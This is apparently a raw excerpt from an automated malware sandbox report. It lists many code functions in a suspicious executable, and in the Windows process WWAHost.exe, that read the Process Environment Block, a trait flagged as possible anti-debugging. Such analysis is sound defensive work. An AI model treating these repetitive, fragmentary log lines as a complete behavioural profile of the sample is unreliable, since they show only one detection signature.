Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 1_2_00B93D34 mov eax, dword ptr fs:[00000030h] 1_2_00B93D34
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 1_2_00B93D34 mov eax, dword ptr fs:[00000030h] 1_2_00B93D34
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 1_2_00B93D34 mov eax, dword ptr fs:[00000030h] 1_2_00B93D34
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 1_2_00B93D34 mov eax, dword ptr fs:[00000030h] 1_2_00B93D34
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 1_2_00B93D34 mov eax, dword ptr fs:[00000030h] 1_2_00B93D34
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 1_2_00B93D34 mov eax, dword ptr fs:[00000030h] 1_2_00B93D34
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 1_2_00B93D34 mov eax, dword ptr fs:[00000030h] 1_2_00B93D34
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 1_2_00B93D34 mov eax, dword ptr fs:[00000030h] 1_2_00B93D34
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 1_2_00B93D34 mov eax, dword ptr fs:[00000030h] 1_2_00B93D34
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 1_2_00B93D34 mov eax, dword ptr fs:[00000030h] 1_2_00B93D34
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 1_2_00B93D34 mov eax, dword ptr fs:[00000030h] 1_2_00B93D34
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 1_2_00B93D34 mov eax, dword ptr fs:[00000030h] 1_2_00B93D34
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 1_2_00BAC577 mov eax, dword ptr fs:[00000030h] 1_2_00BAC577
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 1_2_00BAC577 mov eax, dword ptr fs:[00000030h] 1_2_00BAC577
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 1_2_00BA7D50 mov eax, dword ptr fs:[00000030h] 1_2_00BA7D50
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 1_2_00C58D34 mov eax, dword ptr fs:[00000030h] 1_2_00C58D34
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 1_2_00C0A537 mov eax, dword ptr fs:[00000030h] 1_2_00C0A537
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 1_2_00C4E539 mov eax, dword ptr fs:[00000030h] 1_2_00C4E539
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 1_2_00BC3D43 mov eax, dword ptr fs:[00000030h] 1_2_00BC3D43
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 1_2_00C3FEC0 mov eax, dword ptr fs:[00000030h] 1_2_00C3FEC0
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 7_2_03851B8F mov eax, dword ptr fs:[00000030h] 7_2_03851B8F
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 7_2_03851B8F mov eax, dword ptr fs:[00000030h] 7_2_03851B8F
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 7_2_038FD380 mov ecx, dword ptr fs:[00000030h] 7_2_038FD380
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 7_2_03872397 mov eax, dword ptr fs:[00000030h] 7_2_03872397
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 7_2_03858794 mov eax, dword ptr fs:[00000030h] 7_2_03858794
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 7_2_0387B390 mov eax, dword ptr fs:[00000030h] 7_2_0387B390
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 7_2_038C7794 mov eax, dword ptr fs:[00000030h] 7_2_038C7794
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 7_2_038C7794 mov eax, dword ptr fs:[00000030h] 7_2_038C7794
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 7_2_038C7794 mov eax, dword ptr fs:[00000030h] 7_2_038C7794
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 7_2_0390138A mov eax, dword ptr fs:[00000030h] 7_2_0390138A
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 7_2_03915BA5 mov eax, dword ptr fs:[00000030h] 7_2_03915BA5
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 7_2_038C53CA mov eax, dword ptr fs:[00000030h] 7_2_038C53CA
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 7_2_038C53CA mov eax, dword ptr fs:[00000030h] 7_2_038C53CA
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 7_2_038703E2 mov eax, dword ptr fs:[00000030h] 7_2_038703E2
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 7_2_038703E2 mov eax, dword ptr fs:[00000030h] 7_2_038703E2
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 7_2_038703E2 mov eax, dword ptr fs:[00000030h] 7_2_038703E2
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 7_2_038703E2 mov eax, dword ptr fs:[00000030h] 7_2_038703E2
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 7_2_038703E2 mov eax, dword ptr fs:[00000030h] 7_2_038703E2
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 7_2_038703E2 mov eax, dword ptr fs:[00000030h] 7_2_038703E2
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 7_2_038837F5 mov eax, dword ptr fs:[00000030h] 7_2_038837F5
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 7_2_0387A70E mov eax, dword ptr fs:[00000030h] 7_2_0387A70E
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 7_2_0387A70E mov eax, dword ptr fs:[00000030h] 7_2_0387A70E
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 7_2_0390131B mov eax, dword ptr fs:[00000030h] 7_2_0390131B
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 7_2_0386F716 mov eax, dword ptr fs:[00000030h] 7_2_0386F716
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 7_2_0391070D mov eax, dword ptr fs:[00000030h] 7_2_0391070D
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 7_2_0391070D mov eax, dword ptr fs:[00000030h] 7_2_0391070D
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 7_2_038DFF10 mov eax, dword ptr fs:[00000030h] 7_2_038DFF10
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 7_2_038DFF10 mov eax, dword ptr fs:[00000030h] 7_2_038DFF10
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 7_2_03844F2E mov eax, dword ptr fs:[00000030h] 7_2_03844F2E
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 7_2_03844F2E mov eax, dword ptr fs:[00000030h] 7_2_03844F2E
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 7_2_0387E730 mov eax, dword ptr fs:[00000030h] 7_2_0387E730
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 7_2_0384DB40 mov eax, dword ptr fs:[00000030h] 7_2_0384DB40
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 7_2_0385EF40 mov eax, dword ptr fs:[00000030h] 7_2_0385EF40
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 7_2_03918B58 mov eax, dword ptr fs:[00000030h] 7_2_03918B58
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 7_2_0384F358 mov eax, dword ptr fs:[00000030h] 7_2_0384F358
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 7_2_0384DB60 mov ecx, dword ptr fs:[00000030h] 7_2_0384DB60
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 7_2_0385FF60 mov eax, dword ptr fs:[00000030h] 7_2_0385FF60
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 7_2_03918F6A mov eax, dword ptr fs:[00000030h] 7_2_03918F6A
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 7_2_03873B7A mov eax, dword ptr fs:[00000030h] 7_2_03873B7A
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 7_2_03873B7A mov eax, dword ptr fs:[00000030h] 7_2_03873B7A
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 7_2_038DFE87 mov eax, dword ptr fs:[00000030h] 7_2_038DFE87
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 7_2_0387D294 mov eax, dword ptr fs:[00000030h] 7_2_0387D294
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 7_2_0387D294 mov eax, dword ptr fs:[00000030h] 7_2_0387D294
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 7_2_038452A5 mov eax, dword ptr fs:[00000030h] 7_2_038452A5
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 7_2_038452A5 mov eax, dword ptr fs:[00000030h] 7_2_038452A5
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 7_2_038452A5 mov eax, dword ptr fs:[00000030h] 7_2_038452A5
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 7_2_038452A5 mov eax, dword ptr fs:[00000030h] 7_2_038452A5
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 7_2_038452A5 mov eax, dword ptr fs:[00000030h] 7_2_038452A5
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 7_2_038C46A7 mov eax, dword ptr fs:[00000030h] 7_2_038C46A7
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 7_2_03910EA5 mov eax, dword ptr fs:[00000030h] 7_2_03910EA5
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 7_2_03910EA5 mov eax, dword ptr fs:[00000030h] 7_2_03910EA5
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 7_2_03910EA5 mov eax, dword ptr fs:[00000030h] 7_2_03910EA5
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 7_2_0385AAB0 mov eax, dword ptr fs:[00000030h] 7_2_0385AAB0
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 7_2_0385AAB0 mov eax, dword ptr fs:[00000030h] 7_2_0385AAB0
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 7_2_0387FAB0 mov eax, dword ptr fs:[00000030h] 7_2_0387FAB0
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 7_2_03918ED6 mov eax, dword ptr fs:[00000030h] 7_2_03918ED6
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 7_2_038736CC mov eax, dword ptr fs:[00000030h] 7_2_038736CC
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 7_2_03872ACB mov eax, dword ptr fs:[00000030h] 7_2_03872ACB
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 7_2_038FFEC0 mov eax, dword ptr fs:[00000030h] 7_2_038FFEC0
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 7_2_03888EC7 mov eax, dword ptr fs:[00000030h] 7_2_03888EC7
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 7_2_03872AE4 mov eax, dword ptr fs:[00000030h] 7_2_03872AE4
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 7_2_038716E0 mov ecx, dword ptr fs:[00000030h] 7_2_038716E0
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 7_2_038576E2 mov eax, dword ptr fs:[00000030h] 7_2_038576E2
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 7_2_0384C600 mov eax, dword ptr fs:[00000030h] 7_2_0384C600
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 7_2_0384C600 mov eax, dword ptr fs:[00000030h] 7_2_0384C600
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 7_2_0384C600 mov eax, dword ptr fs:[00000030h] 7_2_0384C600
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 7_2_03878E00 mov eax, dword ptr fs:[00000030h] 7_2_03878E00
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 7_2_03858A0A mov eax, dword ptr fs:[00000030h] 7_2_03858A0A
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 7_2_0384AA16 mov eax, dword ptr fs:[00000030h] 7_2_0384AA16
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 7_2_0384AA16 mov eax, dword ptr fs:[00000030h] 7_2_0384AA16
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 7_2_03863A1C mov eax, dword ptr fs:[00000030h] 7_2_03863A1C
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 7_2_0387A61C mov eax, dword ptr fs:[00000030h] 7_2_0387A61C
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 7_2_0387A61C mov eax, dword ptr fs:[00000030h] 7_2_0387A61C
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 7_2_0384E620 mov eax, dword ptr fs:[00000030h] 7_2_0384E620
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 7_2_038FFE3F mov eax, dword ptr fs:[00000030h] 7_2_038FFE3F
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 7_2_03849240 mov eax, dword ptr fs:[00000030h] 7_2_03849240
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 7_2_03849240 mov eax, dword ptr fs:[00000030h] 7_2_03849240
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 7_2_03849240 mov eax, dword ptr fs:[00000030h] 7_2_03849240
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 7_2_03849240 mov eax, dword ptr fs:[00000030h] 7_2_03849240
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 7_2_03857E41 mov eax, dword ptr fs:[00000030h] 7_2_03857E41
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 7_2_03857E41 mov eax, dword ptr fs:[00000030h] 7_2_03857E41
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 7_2_03857E41 mov eax, dword ptr fs:[00000030h] 7_2_03857E41
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 7_2_03857E41 mov eax, dword ptr fs:[00000030h] 7_2_03857E41
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 7_2_03857E41 mov eax, dword ptr fs:[00000030h] 7_2_03857E41
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 7_2_03857E41 mov eax, dword ptr fs:[00000030h] 7_2_03857E41
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 7_2_038D4257 mov eax, dword ptr fs:[00000030h] 7_2_038D4257
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 7_2_0385766D mov eax, dword ptr fs:[00000030h] 7_2_0385766D
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 7_2_038FB260 mov eax, dword ptr fs:[00000030h] 7_2_038FB260
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 7_2_038FB260 mov eax, dword ptr fs:[00000030h] 7_2_038FB260
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 7_2_0388927A mov eax, dword ptr fs:[00000030h] 7_2_0388927A
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 7_2_03918A62 mov eax, dword ptr fs:[00000030h] 7_2_03918A62
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 7_2_0386AE73 mov eax, dword ptr fs:[00000030h] 7_2_0386AE73
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 7_2_0386AE73 mov eax, dword ptr fs:[00000030h] 7_2_0386AE73
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 7_2_0386AE73 mov eax, dword ptr fs:[00000030h] 7_2_0386AE73
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 7_2_0386AE73 mov eax, dword ptr fs:[00000030h] 7_2_0386AE73
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 7_2_0386AE73 mov eax, dword ptr fs:[00000030h] 7_2_0386AE73
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 7_2_0387A185 mov eax, dword ptr fs:[00000030h] 7_2_0387A185
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 7_2_0386C182 mov eax, dword ptr fs:[00000030h] 7_2_0386C182
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 7_2_03872581 mov eax, dword ptr fs:[00000030h] 7_2_03872581
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 7_2_03872581 mov eax, dword ptr fs:[00000030h] 7_2_03872581
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 7_2_03872581 mov eax, dword ptr fs:[00000030h] 7_2_03872581
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 7_2_03872581 mov eax, dword ptr fs:[00000030h] 7_2_03872581
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 7_2_03842D8A mov eax, dword ptr fs:[00000030h] 7_2_03842D8A
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 7_2_03842D8A mov eax, dword ptr fs:[00000030h] 7_2_03842D8A
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 7_2_03842D8A mov eax, dword ptr fs:[00000030h] 7_2_03842D8A
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 7_2_03842D8A mov eax, dword ptr fs:[00000030h] 7_2_03842D8A
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 7_2_03842D8A mov eax, dword ptr fs:[00000030h] 7_2_03842D8A
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 7_2_03872990 mov eax, dword ptr fs:[00000030h] 7_2_03872990
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 7_2_0387FD9B mov eax, dword ptr fs:[00000030h] 7_2_0387FD9B
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 7_2_0387FD9B mov eax, dword ptr fs:[00000030h] 7_2_0387FD9B
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 7_2_038735A1 mov eax, dword ptr fs:[00000030h] 7_2_038735A1
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 7_2_038761A0 mov eax, dword ptr fs:[00000030h] 7_2_038761A0
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 7_2_038761A0 mov eax, dword ptr fs:[00000030h] 7_2_038761A0
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 7_2_038C69A6 mov eax, dword ptr fs:[00000030h] 7_2_038C69A6
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 7_2_03871DB5 mov eax, dword ptr fs:[00000030h] 7_2_03871DB5
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 7_2_03871DB5 mov eax, dword ptr fs:[00000030h] 7_2_03871DB5
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 7_2_03871DB5 mov eax, dword ptr fs:[00000030h] 7_2_03871DB5
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 7_2_038C51BE mov eax, dword ptr fs:[00000030h] 7_2_038C51BE
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 7_2_038C51BE mov eax, dword ptr fs:[00000030h] 7_2_038C51BE
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 7_2_038C51BE mov eax, dword ptr fs:[00000030h] 7_2_038C51BE
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 7_2_038C51BE mov eax, dword ptr fs:[00000030h] 7_2_038C51BE
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 7_2_0384B1E1 mov eax, dword ptr fs:[00000030h] 7_2_0384B1E1
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 7_2_0384B1E1 mov eax, dword ptr fs:[00000030h] 7_2_0384B1E1
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 7_2_0384B1E1 mov eax, dword ptr fs:[00000030h] 7_2_0384B1E1
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 7_2_038D41E8 mov eax, dword ptr fs:[00000030h] 7_2_038D41E8
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 7_2_0385D5E0 mov eax, dword ptr fs:[00000030h] 7_2_0385D5E0
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 7_2_0385D5E0 mov eax, dword ptr fs:[00000030h] 7_2_0385D5E0
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 7_2_038F8DF1 mov eax, dword ptr fs:[00000030h] 7_2_038F8DF1
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 7_2_03849100 mov eax, dword ptr fs:[00000030h] 7_2_03849100
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 7_2_03849100 mov eax, dword ptr fs:[00000030h] 7_2_03849100
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 7_2_03849100 mov eax, dword ptr fs:[00000030h] 7_2_03849100
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 7_2_03918D34 mov eax, dword ptr fs:[00000030h] 7_2_03918D34
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 7_2_03864120 mov eax, dword ptr fs:[00000030h] 7_2_03864120
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 7_2_03864120 mov eax, dword ptr fs:[00000030h] 7_2_03864120
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 7_2_03864120 mov eax, dword ptr fs:[00000030h] 7_2_03864120
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 7_2_03864120 mov eax, dword ptr fs:[00000030h] 7_2_03864120
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 7_2_03864120 mov ecx, dword ptr fs:[00000030h] 7_2_03864120
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 7_2_03853D34 mov eax, dword ptr fs:[00000030h] 7_2_03853D34
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 7_2_03853D34 mov eax, dword ptr fs:[00000030h] 7_2_03853D34
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 7_2_03853D34 mov eax, dword ptr fs:[00000030h] 7_2_03853D34
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 7_2_03853D34 mov eax, dword ptr fs:[00000030h] 7_2_03853D34
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 7_2_03853D34 mov eax, dword ptr fs:[00000030h] 7_2_03853D34
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 7_2_03853D34 mov eax, dword ptr fs:[00000030h] 7_2_03853D34
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 7_2_03853D34 mov eax, dword ptr fs:[00000030h] 7_2_03853D34
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 7_2_03853D34 mov eax, dword ptr fs:[00000030h] 7_2_03853D34
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 7_2_03853D34 mov eax, dword ptr fs:[00000030h] 7_2_03853D34
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 7_2_03853D34 mov eax, dword ptr fs:[00000030h] 7_2_03853D34
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 7_2_03853D34 mov eax, dword ptr fs:[00000030h] 7_2_03853D34
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 7_2_03853D34 mov eax, dword ptr fs:[00000030h] 7_2_03853D34
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 7_2_03853D34 mov eax, dword ptr fs:[00000030h] 7_2_03853D34
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 7_2_0384AD30 mov eax, dword ptr fs:[00000030h] 7_2_0384AD30
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 7_2_038CA537 mov eax, dword ptr fs:[00000030h] 7_2_038CA537
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 7_2_03874D3B mov eax, dword ptr fs:[00000030h] 7_2_03874D3B
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 7_2_03874D3B mov eax, dword ptr fs:[00000030h] 7_2_03874D3B
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 7_2_03874D3B mov eax, dword ptr fs:[00000030h] 7_2_03874D3B
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 7_2_0387513A mov eax, dword ptr fs:[00000030h] 7_2_0387513A
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 7_2_0387513A mov eax, dword ptr fs:[00000030h] 7_2_0387513A
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 7_2_0386B944 mov eax, dword ptr fs:[00000030h] 7_2_0386B944
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 7_2_0386B944 mov eax, dword ptr fs:[00000030h] 7_2_0386B944
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 7_2_03883D43 mov eax, dword ptr fs:[00000030h] 7_2_03883D43
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 7_2_038C3540 mov eax, dword ptr fs:[00000030h] 7_2_038C3540
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 7_2_03867D50 mov eax, dword ptr fs:[00000030h] 7_2_03867D50
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 7_2_0384C962 mov eax, dword ptr fs:[00000030h] 7_2_0384C962
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 7_2_0386C577 mov eax, dword ptr fs:[00000030h] 7_2_0386C577
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 7_2_0386C577 mov eax, dword ptr fs:[00000030h] 7_2_0386C577
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 7_2_0384B171 mov eax, dword ptr fs:[00000030h] 7_2_0384B171
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 7_2_0384B171 mov eax, dword ptr fs:[00000030h] 7_2_0384B171
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 7_2_03849080 mov eax, dword ptr fs:[00000030h] 7_2_03849080
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 7_2_038C3884 mov eax, dword ptr fs:[00000030h] 7_2_038C3884
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 7_2_038C3884 mov eax, dword ptr fs:[00000030h] 7_2_038C3884
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 7_2_0385849B mov eax, dword ptr fs:[00000030h] 7_2_0385849B
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 7_2_038890AF mov eax, dword ptr fs:[00000030h] 7_2_038890AF
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 7_2_0387F0BF mov ecx, dword ptr fs:[00000030h] 7_2_0387F0BF
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 7_2_0387F0BF mov eax, dword ptr fs:[00000030h] 7_2_0387F0BF
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 7_2_0387F0BF mov eax, dword ptr fs:[00000030h] 7_2_0387F0BF
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 7_2_03918CD6 mov eax, dword ptr fs:[00000030h] 7_2_03918CD6
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 7_2_038DB8D0 mov eax, dword ptr fs:[00000030h] 7_2_038DB8D0
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 7_2_038DB8D0 mov ecx, dword ptr fs:[00000030h] 7_2_038DB8D0
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 7_2_038DB8D0 mov eax, dword ptr fs:[00000030h] 7_2_038DB8D0
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 7_2_038DB8D0 mov eax, dword ptr fs:[00000030h] 7_2_038DB8D0
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 7_2_038DB8D0 mov eax, dword ptr fs:[00000030h] 7_2_038DB8D0
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 7_2_038DB8D0 mov eax, dword ptr fs:[00000030h] 7_2_038DB8D0
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 7_2_039014FB mov eax, dword ptr fs:[00000030h] 7_2_039014FB
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 7_2_038C6CF0 mov eax, dword ptr fs:[00000030h] 7_2_038C6CF0
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 7_2_038C6CF0 mov eax, dword ptr fs:[00000030h] 7_2_038C6CF0
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 7_2_038C6CF0 mov eax, dword ptr fs:[00000030h] 7_2_038C6CF0
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 7_2_03914015 mov eax, dword ptr fs:[00000030h] 7_2_03914015
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 7_2_03914015 mov eax, dword ptr fs:[00000030h] 7_2_03914015
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 7_2_038C6C0A mov eax, dword ptr fs:[00000030h] 7_2_038C6C0A
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 7_2_038C6C0A mov eax, dword ptr fs:[00000030h] 7_2_038C6C0A
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 7_2_038C6C0A mov eax, dword ptr fs:[00000030h] 7_2_038C6C0A
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 7_2_038C6C0A mov eax, dword ptr fs:[00000030h] 7_2_038C6C0A
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 7_2_03901C06 mov eax, dword ptr fs:[00000030h] 7_2_03901C06
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 7_2_03901C06 mov eax, dword ptr fs:[00000030h] 7_2_03901C06
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 7_2_03901C06 mov eax, dword ptr fs:[00000030h] 7_2_03901C06
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 7_2_03901C06 mov eax, dword ptr fs:[00000030h] 7_2_03901C06
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 7_2_03901C06 mov eax, dword ptr fs:[00000030h] 7_2_03901C06
